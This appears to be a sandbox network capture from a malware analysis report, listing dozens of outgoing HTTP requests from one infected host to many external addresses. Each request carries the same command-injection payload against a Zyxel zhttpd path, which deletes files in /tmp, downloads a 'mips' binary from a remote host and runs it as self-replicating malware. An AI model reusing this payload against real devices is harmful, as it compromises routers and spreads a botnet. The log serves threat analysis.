                              Mar 31, 2024 08:41:25.831521034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4333192.168.2.1342136145.244.111.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831561089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4334192.168.2.1354170172.128.210.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831615925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4335192.168.2.134919290.32.119.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831665039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4336192.168.2.1353586140.221.228.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831701994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4337192.168.2.1343136176.232.207.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831743956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4338192.168.2.1336840211.235.179.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831760883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4339192.168.2.1357238199.99.88.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831800938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4340192.168.2.1347562176.240.208.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831840038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4341192.168.2.1334924218.91.141.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831883907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4342192.168.2.1335946157.142.253.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831901073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4343192.168.2.1333002217.105.122.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831964016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4344192.168.2.1348740100.33.116.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831996918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4345192.168.2.1350448122.191.141.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832045078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4346192.168.2.1354652191.9.249.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832070112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4347192.168.2.1358640175.136.129.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832137108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4348192.168.2.134002262.235.75.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832171917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4349192.168.2.133456082.132.121.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832196951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4350192.168.2.1359742135.152.214.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832236052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4351192.168.2.134793292.223.221.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832279921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4352192.168.2.1337494132.58.193.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832318068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4353192.168.2.1353614110.123.42.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832354069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4354192.168.2.1333696107.70.53.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832386971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4355192.168.2.1355282191.142.62.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832432032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4356192.168.2.135974443.60.240.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832461119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4357192.168.2.1358292106.120.24.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832485914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4358192.168.2.1332848209.220.106.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832536936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4359192.168.2.1347180177.183.126.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.832700014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4360192.168.2.1344228194.228.0.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.834527016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4361192.168.2.1348430188.99.158.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.835163116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4362192.168.2.1360600166.161.224.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.835280895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4363192.168.2.1333408100.162.37.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.835711956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4364192.168.2.1357646126.12.2.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836287022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4365192.168.2.1342954107.39.96.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836318970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4366192.168.2.135596213.235.179.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836366892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4367192.168.2.1335790104.38.226.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836395025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4368192.168.2.1343652175.106.113.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836450100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4369192.168.2.1344688119.213.75.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836462975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4370192.168.2.1360306130.95.230.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836502075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4371192.168.2.133669648.84.111.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836539984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4372192.168.2.133435427.48.123.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836568117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4373192.168.2.1352462150.73.39.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836622953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4374192.168.2.1338320116.148.101.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836644888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4375192.168.2.1333148216.96.86.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836680889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4376192.168.2.13601841.216.58.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836745024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4377192.168.2.133382827.60.250.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.836771965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4378192.168.2.1343570191.70.168.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.840569019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4379192.168.2.134868082.118.233.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.840606928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4380192.168.2.1357242177.164.227.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.840646982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4381192.168.2.1347118139.208.135.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.840691090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4382192.168.2.1344000134.147.207.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.840755939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4383192.168.2.1342110141.97.110.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.840797901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4384192.168.2.1346392165.39.77.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.845813990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4385192.168.2.13433782.138.90.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.845839977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4386192.168.2.1334436219.214.230.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.845940113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4387192.168.2.134787432.130.202.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846071005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4388192.168.2.1345296152.39.175.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846137047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4389192.168.2.135695878.34.38.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846189976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4390192.168.2.135400837.45.248.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846282959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4391192.168.2.1333758169.120.232.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846364021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4392192.168.2.133422231.136.191.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846435070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4393192.168.2.1357884103.241.14.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846524954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4394192.168.2.134270649.185.50.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846563101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4395192.168.2.134817094.5.140.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846600056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4396192.168.2.133440823.191.188.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846657038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4397192.168.2.1334654139.246.59.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846736908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4398192.168.2.1351110175.81.141.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846771002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4399192.168.2.1347580150.79.45.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846843958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4400192.168.2.135199471.239.26.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.846916914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4401192.168.2.1352330213.23.210.143443
                              TimestampBytes transferredDirectionData
